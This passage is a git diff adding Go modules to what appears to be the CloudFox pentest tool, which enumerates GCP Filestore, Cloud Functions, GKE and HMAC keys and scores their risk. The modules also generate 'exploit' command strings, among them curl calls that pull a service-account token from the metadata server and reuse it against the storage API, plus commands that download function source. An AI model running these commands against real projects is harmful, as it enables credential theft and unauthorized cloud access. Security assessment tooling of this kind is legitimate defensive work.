+1,96 @@ +package filestoreservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + file "google.golang.org/api/file/v1" +) + +type FilestoreService struct { + session *gcpinternal.SafeSession +} + +func New() *FilestoreService { + return &FilestoreService{} +} + +type FilestoreInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Tier string `json:"tier"` + State string `json:"state"` + Network string `json:"network"` + IPAddresses []string `json:"ipAddresses"` + Shares []ShareInfo `json:"shares"` + CreateTime string `json:"createTime"` +} + +type ShareInfo struct { + Name string `json:"name"` + CapacityGB int64 `json:"capacityGb"` +} + +func (s *FilestoreService) ListInstances(projectID string) ([]FilestoreInstanceInfo, error) { + ctx := context.Background() + service, err := file.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Filestore service: %v", err) + } + + var instances []FilestoreInstanceInfo + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *file.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := FilestoreInstanceInfo{ + Name: extractResourceName(instance.Name), + ProjectID: projectID, + Location: extractLocation(instance.Name), + Tier: instance.Tier, + State: instance.State, + CreateTime: instance.CreateTime, + } + + if len(instance.Networks) > 0 { + info.Network = instance.Networks[0].Network + info.IPAddresses = instance.Networks[0].IpAddresses + } + + for _, share := range instance.FileShares { + info.Shares = append(info.Shares, ShareInfo{ + Name: share.Name, + CapacityGB: share.CapacityGb, + }) + } + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, err + } + return instances, nil +} + +func extractResourceName(name string) string { + parts := strings.Split(name, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return name +} + +func extractLocation(name string) string { + parts := strings.Split(name, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/functionsService/functionsService.go b/gcp/services/functionsService/functionsService.go new file mode 100644 index 00000000..6f757976 --- /dev/null +++ b/gcp/services/functionsService/functionsService.go @@ -0,0 +1,379 @@ +package functionsservice + +import ( + "context" + "fmt" + "strings" + + cloudfunctions "google.golang.org/api/cloudfunctions/v2" +) + +type FunctionsService struct{} + +func New() *FunctionsService { + return &FunctionsService{} +} + +// FunctionInfo holds Cloud Function details with security-relevant information +type FunctionInfo struct { + // Basic info + Name string + ProjectID string + Region string + State string + Description string + + // Runtime info + Runtime string + EntryPoint string + BuildID string + UpdateTime string + + // Security-relevant configuration + ServiceAccount string + IngressSettings string // ALL_TRAFFIC, INTERNAL_ONLY, INTERNAL_AND_GCLB + VPCConnector string + VPCEgressSettings string // PRIVATE_RANGES_ONLY, ALL_TRAFFIC + AllTrafficOnLatest bool + + // Trigger info + TriggerType string // HTTP, Pub/Sub, Cloud Storage, etc. + TriggerURL string // For HTTP functions + TriggerEventType string + TriggerResource string + + // Environment variables (sanitized - just names, not values) + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int + + // IAM (if retrieved) + InvokerMembers []string // Who can invoke this function + IsPublic bool // allUsers or allAuthenticatedUsers can invoke + + // Pentest-specific fields + EnvVarNames []string // Names of env vars (may hint at secrets) + SecretEnvVarNames []string // Names of secret env vars + SecretVolumeNames []string // Names of secret volumes + SourceLocation string // GCS or repo source location + SourceType string // GCS, Repository + RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string // Why it's risky +} + +// FunctionSecurityAnalysis contains detailed security analysis for a function +type FunctionSecurityAnalysis struct { + FunctionName string `json:"functionName"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + ServiceAccount string `json:"serviceAccount"` + IsPublic bool `json:"isPublic"` + TriggerURL string `json:"triggerURL"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string `json:"exploitCommands"` +} + +// Functions retrieves all Cloud Functions in a project across all regions +func (fs *FunctionsService) Functions(projectID string) ([]FunctionInfo, error) { + ctx := context.Background() + + service, err := cloudfunctions.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Functions service: %v", err) + } + + var functions []FunctionInfo + + // List functions across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Functions.List(parent) + err = call.Pages(ctx, func(page *cloudfunctions.ListFunctionsResponse) error { + for _, fn := range page.Functions { + info := parseFunctionInfo(fn, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := fs.getFunctionIAMPolicy(service, fn.Name) + if iamErr == nil && iamPolicy != nil { + info.InvokerMembers, info.IsPublic = parseInvokerBindings(iamPolicy) + } + + functions = append(functions, info) + } + return nil + }) + + if err != nil { + return nil, fmt.Errorf("failed to list functions: %v", err) + } + + return functions, nil +} + +// parseFunctionInfo extracts relevant information from a Cloud Function +func parseFunctionInfo(fn *cloudfunctions.Function, projectID string) FunctionInfo { + info := FunctionInfo{ + Name: extractFunctionName(fn.Name), + ProjectID: projectID, + State: fn.State, + RiskReasons: []string{}, + } + + // Extract region from function name + // Format: projects/{project}/locations/{location}/functions/{name} + parts := strings.Split(fn.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Build configuration + if fn.BuildConfig != nil { + info.Runtime = fn.BuildConfig.Runtime + info.EntryPoint = fn.BuildConfig.EntryPoint + info.BuildID = fn.BuildConfig.Build + + // Extract source location (pentest-relevant) + if fn.BuildConfig.Source != nil { + if fn.BuildConfig.Source.StorageSource != nil { + info.SourceType = "GCS" + info.SourceLocation = fmt.Sprintf("gs://%s/%s", + fn.BuildConfig.Source.StorageSource.Bucket, + fn.BuildConfig.Source.StorageSource.Object) + } else if fn.BuildConfig.Source.RepoSource != nil { + info.SourceType = "Repository" + info.SourceLocation = fmt.Sprintf("%s/%s@%s", + fn.BuildConfig.Source.RepoSource.ProjectId, + fn.BuildConfig.Source.RepoSource.RepoName, + fn.BuildConfig.Source.RepoSource.BranchName) + } + } + } + + // Service configuration + if fn.ServiceConfig != nil { + info.ServiceAccount = fn.ServiceConfig.ServiceAccountEmail + info.IngressSettings = fn.ServiceConfig.IngressSettings + info.VPCConnector = fn.ServiceConfig.VpcConnector + info.VPCEgressSettings = fn.ServiceConfig.VpcConnectorEgressSettings + info.AllTrafficOnLatest = fn.ServiceConfig.AllTrafficOnLatestRevision + + // Extract environment variable names (pentest-relevant - may hint at secrets) + if fn.ServiceConfig.EnvironmentVariables != nil { + info.EnvVarCount = len(fn.ServiceConfig.EnvironmentVariables) + for key := range fn.ServiceConfig.EnvironmentVariables { + info.EnvVarNames = append(info.EnvVarNames, key) + } + } + + // Extract secret environment variable names + if fn.ServiceConfig.SecretEnvironmentVariables != nil { + info.SecretEnvVarCount = len(fn.ServiceConfig.SecretEnvironmentVariables) + for _, secret := range fn.ServiceConfig.SecretEnvironmentVariables { + if secret != nil { + info.SecretEnvVarNames = append(info.SecretEnvVarNames, secret.Key) + } + } + } + + // Extract secret volume names + if fn.ServiceConfig.SecretVolumes != nil { + info.SecretVolumeCount = len(fn.ServiceConfig.SecretVolumes) + for _, vol := range fn.ServiceConfig.SecretVolumes { + if vol != nil { + info.SecretVolumeNames = append(info.SecretVolumeNames, vol.Secret) + } + } + } + + // Get HTTP trigger URL from service config + info.TriggerURL = fn.ServiceConfig.Uri + } + + // Event trigger configuration + if fn.EventTrigger != nil { + info.TriggerType = "Event" + info.TriggerEventType = fn.EventTrigger.EventType + info.TriggerResource = fn.EventTrigger.PubsubTopic + if info.TriggerResource == "" { + info.TriggerResource = fn.EventTrigger.Channel + } + } else if info.TriggerURL != "" { + info.TriggerType = "HTTP" + } + + info.Description = fn.Description + info.UpdateTime = fn.UpdateTime + + return info +} + +// getFunctionIAMPolicy retrieves the IAM policy for a function +func (fs *FunctionsService) getFunctionIAMPolicy(service *cloudfunctions.Service, functionName string) (*cloudfunctions.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.Functions.GetIamPolicy(functionName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseInvokerBindings extracts who can invoke the function and checks for public access +func parseInvokerBindings(policy *cloudfunctions.Policy) ([]string, bool) { + var invokers []string + isPublic := false + + for _, binding := range policy.Bindings { + // Check for invoker roles + if binding.Role == "roles/cloudfunctions.invoker" || + binding.Role == "roles/run.invoker" { + invokers = append(invokers, binding.Members...) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + isPublic = true + } + } + } + } + + return invokers, isPublic +} + +// extractFunctionName extracts just the function name from the full resource name +func extractFunctionName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// AnalyzeFunctionSecurity performs security analysis on a function +func (fs *FunctionsService) AnalyzeFunctionSecurity(fn FunctionInfo) FunctionSecurityAnalysis { + analysis := FunctionSecurityAnalysis{ + FunctionName: fn.Name, + ProjectID: fn.ProjectID, + Region: fn.Region, + ServiceAccount: fn.ServiceAccount, + IsPublic: fn.IsPublic, + TriggerURL: fn.TriggerURL, + RiskReasons: []string{}, + ExploitCommands: []string{}, + } + + score := 0 + + // Check for public access (CRITICAL) + if fn.IsPublic { + analysis.RiskReasons = append(analysis.RiskReasons, + "Function is publicly accessible (allUsers/allAuthenticatedUsers)") + if fn.TriggerURL != "" { + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# PUBLIC function - direct access:\ncurl -s '%s'", fn.TriggerURL)) + } + score += 3 + } + + // Check ingress settings + if fn.IngressSettings == "ALLOW_ALL" || fn.IngressSettings == "ALL_TRAFFIC" { + analysis.RiskReasons = append(analysis.RiskReasons, + "Function allows all ingress traffic") + score += 1 + } + + // Check for default service account (often over-privileged) + if strings.Contains(fn.ServiceAccount, "-compute@developer.gserviceaccount.com") || + strings.Contains(fn.ServiceAccount, "@appspot.gserviceaccount.com") { + analysis.RiskReasons = append(analysis.RiskReasons, + "Uses default service account (often has excessive permissions)") + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Check default SA permissions:\ngcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'", + fn.ProjectID, fn.ServiceAccount)) + score += 2 + } + + // Check for secrets (potential for exfiltration if function is compromised) + if fn.SecretEnvVarCount > 0 || fn.SecretVolumeCount > 0 { + analysis.RiskReasons = append(analysis.RiskReasons, + fmt.Sprintf("Function has access to %d secret env vars and %d secret volumes", + fn.SecretEnvVarCount, fn.SecretVolumeCount)) + score += 1 + } + + // Check for sensitive env var names + sensitiveVars := []string{} + for _, varName := range fn.EnvVarNames { + if containsSensitiveKeyword(varName) { + sensitiveVars = append(sensitiveVars, varName) + } + } + if len(sensitiveVars) > 0 { + analysis.RiskReasons = append(analysis.RiskReasons, + fmt.Sprintf("Environment variables with sensitive names: %s", strings.Join(sensitiveVars, ", "))) + score += 1 + } + + // Check VPC connector (lateral movement potential) + if fn.VPCConnector != "" { + analysis.RiskReasons = append(analysis.RiskReasons, + fmt.Sprintf("Function has VPC connector: %s (lateral movement potential)", fn.VPCConnector)) + score += 1 + } + + // Source code access + if fn.SourceLocation != "" && fn.SourceType == "GCS" { + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Download function source code:\ngsutil cp %s ./function-source.zip && unzip function-source.zip", + fn.SourceLocation)) + } + + // Add general enumeration commands + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Get function details:\ngcloud functions describe %s --region=%s --project=%s --gen2", + fn.Name, fn.Region, fn.ProjectID)) + + if fn.TriggerType == "HTTP" && fn.TriggerURL != "" { + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Invoke function with auth:\ncurl -s -X POST '%s' -H 'Authorization: Bearer $(gcloud auth print-identity-token)' -H 'Content-Type: application/json' -d '{}'", + fn.TriggerURL)) + } + + // Determine risk level + if score >= 4 { + analysis.RiskLevel = "CRITICAL" + } else if score >= 3 { + analysis.RiskLevel = "HIGH" + } else if score >= 2 { + analysis.RiskLevel = "MEDIUM" + } else if score >= 1 { + analysis.RiskLevel = "LOW" + } else { + analysis.RiskLevel = "INFO" + } + + return analysis +} + +// containsSensitiveKeyword checks if a variable name might contain secrets +func containsSensitiveKeyword(name string) bool { + sensitiveKeywords := []string{ + "SECRET", "PASSWORD", "PASSWD", "PWD", + "TOKEN", "KEY", "CREDENTIAL", "CRED", + "AUTH", "API_KEY", "APIKEY", "PRIVATE", + "DATABASE", "DB_PASS", "MONGO", "MYSQL", + "POSTGRES", "REDIS", "WEBHOOK", "SLACK", + "SENDGRID", "STRIPE", "AWS", "AZURE", + } + + upperName := strings.ToUpper(name) + for _, keyword := range sensitiveKeywords { + if strings.Contains(upperName, keyword) { + return true + } + } + return false +} diff --git a/gcp/services/gkeService/gkeService.go b/gcp/services/gkeService/gkeService.go new file mode 100644 index 00000000..b231e1f7 --- /dev/null +++ b/gcp/services/gkeService/gkeService.go @@ -0,0 +1,466 @@ +package gkeservice + +import ( + "context" + "fmt" + "strings" + + container "google.golang.org/api/container/v1" +) + +type GKEService struct{} + +func New() *GKEService { + return &GKEService{} +} + +// ClusterInfo holds GKE cluster details with security-relevant information +type ClusterInfo struct { + // Basic info + Name string + ProjectID string + Location string // Zone or Region + Status string + Description string + + // Version info + CurrentMasterVersion string + CurrentNodeVersion string + ReleaseChannel string + + // Network configuration + Network string + Subnetwork string + ClusterIPv4CIDR string + ServicesIPv4CIDR string + Endpoint string // Master endpoint + PrivateCluster bool + MasterAuthorizedOnly bool + MasterAuthorizedCIDRs []string + + // Security configuration + NetworkPolicy bool + PodSecurityPolicy bool // Deprecated but may still be in use + BinaryAuthorization bool + ShieldedNodes bool + SecureBoot bool + IntegrityMonitoring bool + WorkloadIdentity string // Workload Identity Pool + NodeServiceAccount string + + // Authentication + LegacyABAC bool // Legacy ABAC authorization + IssueClientCertificate bool + BasicAuthEnabled bool // Deprecated + + // Logging and Monitoring + LoggingService string + MonitoringService string + + // Node pool info (aggregated) + NodePoolCount int + TotalNodeCount int + AutoscalingEnabled bool + + // Security issues detected + SecurityIssues []string +} + +// NodePoolInfo holds node pool details +type NodePoolInfo struct { + ClusterName string + Name string + ProjectID string + Location string + Status string + NodeCount int + MachineType string + DiskSizeGb int64 + DiskType string + ImageType string + ServiceAccount string + AutoRepair bool + AutoUpgrade bool + SecureBoot bool + IntegrityMonitoring bool + Preemptible bool + Spot bool + OAuthScopes []string + // Pentest-specific fields + HasCloudPlatformScope bool // Full access to GCP + RiskyScopes []string // Scopes that enable attacks +} + +// ClusterSecurityAnalysis contains detailed security analysis for a cluster +type ClusterSecurityAnalysis struct { + ClusterName string `json:"clusterName"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + AttackSurface []string `json:"attackSurface"` + PrivescPaths []string `json:"privescPaths"` + ExploitCommands []string `json:"exploitCommands"` +} + +// Clusters retrieves all GKE clusters in a project +func (gs *GKEService) Clusters(projectID string) ([]ClusterInfo, []NodePoolInfo, error) { + ctx := context.Background() + + service, err := container.NewService(ctx) + if err != nil { + return nil, nil, fmt.Errorf("failed to create GKE service: %v", err) + } + + // List clusters across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + resp, err := service.Projects.Locations.Clusters.List(parent).Do() + if err != nil { + return nil, nil, fmt.Errorf("failed to list clusters: %v", err) + } + + var clusters []ClusterInfo + var nodePools []NodePoolInfo + + for _, cluster := range resp.Clusters { + info := parseClusterInfo(cluster, projectID) + clusters = append(clusters, info) + + // Parse node pools + for _, np := range cluster.NodePools { + npInfo := parseNodePoolInfo(np, cluster.Name, projectID, cluster.Location) + nodePools = append(nodePools, npInfo) + } + } + + return clusters, nodePools, nil +} + +// parseClusterInfo extracts security-relevant information from a GKE cluster +func parseClusterInfo(cluster *container.Cluster, projectID string) ClusterInfo { + info := ClusterInfo{ + Name: cluster.Name, + ProjectID: projectID, + Location: cluster.Location, + Status: cluster.Status, + Description: cluster.Description, + CurrentMasterVersion: cluster.CurrentMasterVersion, + CurrentNodeVersion: cluster.CurrentNodeVersion, + Endpoint: cluster.Endpoint, + Network: cluster.Network, + Subnetwork: cluster.Subnetwork, + ClusterIPv4CIDR: cluster.ClusterIpv4Cidr, + ServicesIPv4CIDR: cluster.ServicesIpv4Cidr, + LoggingService: cluster.LoggingService, + MonitoringService: cluster.MonitoringService, + SecurityIssues: []string{}, + } + + // Release channel + if cluster.ReleaseChannel != nil { + info.ReleaseChannel = cluster.ReleaseChannel.Channel + } + + // Private cluster configuration + if cluster.PrivateClusterConfig != nil { + info.PrivateCluster = cluster.PrivateClusterConfig.EnablePrivateNodes + if cluster.PrivateClusterConfig.EnablePrivateEndpoint { + info.Endpoint = cluster.PrivateClusterConfig.PrivateEndpoint + } + } + + // Master authorized networks + if cluster.MasterAuthorizedNetworksConfig != nil { + info.MasterAuthorizedOnly = cluster.MasterAuthorizedNetworksConfig.Enabled + for _, cidr := range cluster.MasterAuthorizedNetworksConfig.CidrBlocks { + info.MasterAuthorizedCIDRs = append(info.MasterAuthorizedCIDRs, cidr.CidrBlock) + } + } + + // Network policy + if cluster.NetworkPolicy != nil { + info.NetworkPolicy = cluster.NetworkPolicy.Enabled + } + + // Binary authorization + if cluster.BinaryAuthorization != nil { + info.BinaryAuthorization = cluster.BinaryAuthorization.Enabled + } + + // Shielded nodes + if cluster.ShieldedNodes != nil { + info.ShieldedNodes = cluster.ShieldedNodes.Enabled + } + + // Workload Identity + if cluster.WorkloadIdentityConfig != nil { + info.WorkloadIdentity = cluster.WorkloadIdentityConfig.WorkloadPool + } + + // Legacy ABAC (should be disabled) + if cluster.LegacyAbac != nil { + info.LegacyABAC = cluster.LegacyAbac.Enabled + } + + // Master auth (legacy) + if cluster.MasterAuth != nil { + info.IssueClientCertificate = cluster.MasterAuth.ClientCertificateConfig != nil && + cluster.MasterAuth.ClientCertificateConfig.IssueClientCertificate + // Check for basic auth (deprecated) + if cluster.MasterAuth.Username != "" { + info.BasicAuthEnabled = true + } + } + + // Count node pools and nodes + info.NodePoolCount = len(cluster.NodePools) + for _, np := range cluster.NodePools { + if np.Autoscaling != nil && np.Autoscaling.Enabled { + info.AutoscalingEnabled = true + } + info.TotalNodeCount += int(np.InitialNodeCount) + + // Get node service account from first pool + if info.NodeServiceAccount == "" && np.Config != nil { + info.NodeServiceAccount = np.Config.ServiceAccount + } + + // Check shielded node config + if np.Config != nil && np.Config.ShieldedInstanceConfig != nil { + info.SecureBoot = np.Config.ShieldedInstanceConfig.EnableSecureBoot + info.IntegrityMonitoring = np.Config.ShieldedInstanceConfig.EnableIntegrityMonitoring + } + } + + // Identify security issues + info.SecurityIssues = identifySecurityIssues(info) + + return info +} + +// parseNodePoolInfo extracts information from a node pool +func parseNodePoolInfo(np *container.NodePool, clusterName, projectID, location string) NodePoolInfo { + info := NodePoolInfo{ + ClusterName: clusterName, + Name: np.Name, + ProjectID: projectID, + Location: location, + Status: np.Status, + NodeCount: int(np.InitialNodeCount), + } + + if np.Config != nil { + info.MachineType = np.Config.MachineType + info.DiskSizeGb = np.Config.DiskSizeGb + info.DiskType = np.Config.DiskType + info.ImageType = np.Config.ImageType + info.ServiceAccount = np.Config.ServiceAccount + info.OAuthScopes = np.Config.OauthScopes + info.Preemptible = np.Config.Preemptible + info.Spot = np.Config.Spot + + if np.Config.ShieldedInstanceConfig != nil { + info.SecureBoot = np.Config.ShieldedInstanceConfig.EnableSecureBoot + info.IntegrityMonitoring = np.Config.ShieldedInstanceConfig.EnableIntegrityMonitoring + } + + // Analyze OAuth scopes for risky permissions + info.HasCloudPlatformScope, info.RiskyScopes = analyzeOAuthScopes(np.Config.OauthScopes) + } + + if np.Management != nil { + info.AutoRepair = np.Management.AutoRepair + info.AutoUpgrade = np.Management.AutoUpgrade + } + + return info +} + +// analyzeOAuthScopes identifies risky OAuth scopes +func analyzeOAuthScopes(scopes []string) (hasCloudPlatform bool, riskyScopes []string) { + riskyPatterns := map[string]string{ + "https://www.googleapis.com/auth/cloud-platform": "Full GCP access", + "https://www.googleapis.com/auth/compute": "Full Compute Engine access", + "https://www.googleapis.com/auth/devstorage.full_control": "Full Cloud Storage access", + "https://www.googleapis.com/auth/devstorage.read_write": "Read/write Cloud Storage", + "https://www.googleapis.com/auth/logging.admin": "Logging admin (can delete logs)", + "https://www.googleapis.com/auth/source.full_control": "Full source repo access", + "https://www.googleapis.com/auth/sqlservice.admin": "Cloud SQL admin", + } + + for _, scope := range scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" { + hasCloudPlatform = true + } + if desc, found := riskyPatterns[scope]; found { + riskyScopes = append(riskyScopes, fmt.Sprintf("%s: %s", scope, desc)) + } + } + + return +} + +// identifySecurityIssues checks for common security misconfigurations +func identifySecurityIssues(cluster ClusterInfo) []string { + var issues []string + + // Public endpoint without authorized networks + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + issues = append(issues, "Public endpoint without master authorized networks") + } + + // Legacy ABAC enabled + if cluster.LegacyABAC { + issues = append(issues, "Legacy ABAC authorization enabled") + } + + // Basic auth enabled + if cluster.BasicAuthEnabled { + issues = append(issues, "Basic authentication enabled (deprecated)") + } + + // Client certificate + if cluster.IssueClientCertificate { + issues = append(issues, "Client certificate authentication enabled") + } + + // No network policy + if !cluster.NetworkPolicy { + issues = append(issues, "Network policy not enabled") + } + + // No workload identity + if cluster.WorkloadIdentity == "" { + issues = append(issues, "Workload Identity not configured") + } + + // Shielded nodes not enabled + if !cluster.ShieldedNodes { + issues = append(issues, "Shielded nodes not enabled") + } + + // Default service account on nodes + if cluster.NodeServiceAccount == "default" || + strings.HasSuffix(cluster.NodeServiceAccount, "-compute@developer.gserviceaccount.com") { + issues = append(issues, "Default service account used on nodes") + } + + // No release channel (manual upgrades) + if cluster.ReleaseChannel == "" || cluster.ReleaseChannel == "UNSPECIFIED" { + issues = append(issues, "No release channel configured") + } + + return issues +} + +// AnalyzeClusterSecurity performs detailed security analysis on a cluster +func (gs *GKEService) AnalyzeClusterSecurity(cluster ClusterInfo, nodePools []NodePoolInfo) ClusterSecurityAnalysis { + analysis := ClusterSecurityAnalysis{ + ClusterName: cluster.Name, + ProjectID: cluster.ProjectID, + Location: cluster.Location, + RiskReasons: []string{}, + AttackSurface: []string{}, + PrivescPaths: []string{}, + ExploitCommands: []string{}, + } + + score := 0 + + // Analyze attack surface + if !cluster.PrivateCluster { + analysis.AttackSurface = append(analysis.AttackSurface, "Public cluster endpoint") + if !cluster.MasterAuthorizedOnly { + analysis.AttackSurface = append(analysis.AttackSurface, "No master authorized networks") + analysis.RiskReasons = append(analysis.RiskReasons, "Public endpoint accessible from any IP") + score += 3 + } + } + + if cluster.LegacyABAC { + analysis.AttackSurface = append(analysis.AttackSurface, "Legacy ABAC enabled") + analysis.RiskReasons = append(analysis.RiskReasons, "Legacy ABAC can be exploited for privilege escalation") + score += 2 + } + + if cluster.BasicAuthEnabled { + analysis.AttackSurface = append(analysis.AttackSurface, "Basic auth enabled") + analysis.RiskReasons = append(analysis.RiskReasons, "Basic auth credentials may be leaked") + score += 2 + } + + // Analyze privilege escalation paths + if cluster.WorkloadIdentity == "" { + analysis.PrivescPaths = append(analysis.PrivescPaths, + "No Workload Identity - pods can access node SA via metadata") + analysis.RiskReasons = append(analysis.RiskReasons, "Metadata server accessible from pods") + score += 2 + } + + // Analyze node pools for risky configurations + for _, np := range nodePools { + if np.ClusterName != cluster.Name { + continue + } + + if np.HasCloudPlatformScope { + analysis.PrivescPaths = append(analysis.PrivescPaths, + fmt.Sprintf("Node pool %s has cloud-platform scope - full GCP access from pods", np.Name)) + analysis.RiskReasons = append(analysis.RiskReasons, + fmt.Sprintf("Node pool %s: cloud-platform scope enables full GCP access", np.Name)) + score += 3 + } + + if strings.HasSuffix(np.ServiceAccount, "-compute@developer.gserviceaccount.com") || + np.ServiceAccount == "default" { + analysis.PrivescPaths = append(analysis.PrivescPaths, + fmt.Sprintf("Node pool %s uses default SA (often has broad permissions)", np.Name)) + score += 1 + } + } + + if !cluster.NetworkPolicy { + analysis.AttackSurface = append(analysis.AttackSurface, "No network policy - pods can communicate freely") + score += 1 + } + + // Generate exploitation commands + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Get cluster credentials:\ngcloud container clusters get-credentials %s --zone=%s --project=%s", + cluster.Name, cluster.Location, cluster.ProjectID)) + + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + analysis.ExploitCommands = append(analysis.ExploitCommands, + "# Cluster API is publicly accessible, attempt kubectl commands") + } + + if cluster.WorkloadIdentity == "" { + analysis.ExploitCommands = append(analysis.ExploitCommands, + "# No Workload Identity - access metadata from pod:\n# curl -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token") + } + + // Check for node pools with cloud-platform scope + for _, np := range nodePools { + if np.ClusterName == cluster.Name && np.HasCloudPlatformScope { + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# From pod on node pool %s, access any GCP API:\n# TOKEN=$(curl -s -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token | jq -r .access_token)\n# curl -H \"Authorization: Bearer $TOKEN\" https://www.googleapis.com/storage/v1/b?project=%s", + np.Name, cluster.ProjectID)) + } + } + + // Determine risk level + if score >= 6 { + analysis.RiskLevel = "CRITICAL" + } else if score >= 4 { + analysis.RiskLevel = "HIGH" + } else if score >= 2 { + analysis.RiskLevel = "MEDIUM" + } else if score >= 1 { + analysis.RiskLevel = "LOW" + } else { + analysis.RiskLevel = "INFO" + } + + return analysis +} diff --git a/gcp/services/hmacService/hmacService.go b/gcp/services/hmacService/hmacService.go new file mode 100644 index 00000000..071dda23 --- /dev/null +++ b/gcp/services/hmacService/hmacService.go @@ -0,0 +1,159 @@ +package hmacservice + +import ( + "context" + "fmt" + "time" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/storage/v1" +) + +type HMACService struct { + session *gcpinternal.SafeSession +} + +func New() *HMACService { + return &HMACService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *HMACService { + return &HMACService{session: session} +} + +// HMACKeyInfo represents a GCS HMAC key (S3-compatible access) +type HMACKeyInfo struct { + AccessID string `json:"accessId"` + ProjectID string `json:"projectId"` + ServiceAccountEmail string `json:"serviceAccountEmail"` + State string `json:"state"` // ACTIVE, INACTIVE, DELETED + TimeCreated time.Time `json:"timeCreated"` + Updated time.Time `json:"updated"` + Etag string `json:"etag"` + // Pentest-specific fields + IsActive bool `json:"isActive"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ListHMACKeys lists all HMAC keys in a project +func (s *HMACService) ListHMACKeys(projectID string) ([]HMACKeyInfo, error) { + ctx := context.Background() + var storageService *storage.Service + var err error + + if s.session != nil { + storageService, err = storage.NewService(ctx, s.session.GetClientOption()) + } else { + storageService, err = storage.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create storage service: %v", err) + } + + var keys []HMACKeyInfo + + // List all HMAC keys for the project + req := storageService.Projects.HmacKeys.List(projectID) + err = req.Pages(ctx, func(page *storage.HmacKeysMetadata) error { + for _, key := range page.Items { + info := s.parseHMACKey(key, projectID) + keys = append(keys, info) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list HMAC keys: %v", err) + } + + return keys, nil +} + +func (s *HMACService) parseHMACKey(key *storage.HmacKeyMetadata, projectID string) HMACKeyInfo { + info := HMACKeyInfo{ + AccessID: key.AccessId, + ProjectID: projectID, + ServiceAccountEmail: key.ServiceAccountEmail, + State: key.State, + Etag: key.Etag, + IsActive: key.State == "ACTIVE", + RiskReasons: []string{}, + } + + // Parse timestamps + if key.TimeCreated != "" { + if t, err := time.Parse(time.RFC3339, key.TimeCreated); err == nil { + info.TimeCreated = t + } + } + if key.Updated != "" { + if t, err := time.Parse(time.RFC3339, key.Updated); err == nil { + info.Updated = t + } + } + + // Analyze risk + info.RiskLevel, info.RiskReasons = s.analyzeHMACKeyRisk(info) + + return info +} + +func (s *HMACService) analyzeHMACKeyRisk(key HMACKeyInfo) (string, []string) { + var reasons []string + score := 0 + + // Active keys are more risky + if key.IsActive { + reasons = append(reasons, "HMAC key is ACTIVE (can be used for S3-compatible access)") + score += 2 + } + + // Check key age + if !key.TimeCreated.IsZero() { + age := time.Since(key.TimeCreated) + if age > 365*24*time.Hour { + reasons = append(reasons, fmt.Sprintf("Key is over 1 year old (%d days)", int(age.Hours()/24))) + score += 2 + } else if age > 90*24*time.Hour { + reasons = append(reasons, fmt.Sprintf("Key is over 90 days old (%d days)", int(age.Hours()/24))) + score += 1 + } + } + + // Default compute SA HMAC keys are especially risky + if key.ServiceAccountEmail != "" { + if isDefaultComputeSA(key.ServiceAccountEmail) { + reasons = append(reasons, "HMAC key belongs to default compute service account") + score += 1 + } + } + + if score >= 4 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func isDefaultComputeSA(email string) bool { + // Check for default compute service account pattern + return len(email) > 0 && + (contains(email, "-compute@developer.gserviceaccount.com") || + contains(email, "@appspot.gserviceaccount.com")) +} + +func contains(s, substr string) bool { + return len(s) >= len(substr) && (s == substr || len(s) > 0 && containsSubstr(s, substr)) +} + +func containsSubstr(s, substr string) bool { + for i := 0; i <= len(s)-len(substr); i++ { + if s[i:i+len(substr)] == substr { + return true + } + } + return false +} diff --git a/gcp/services/iamService/iamService.go b/gcp/services/iamService/iamService.go index 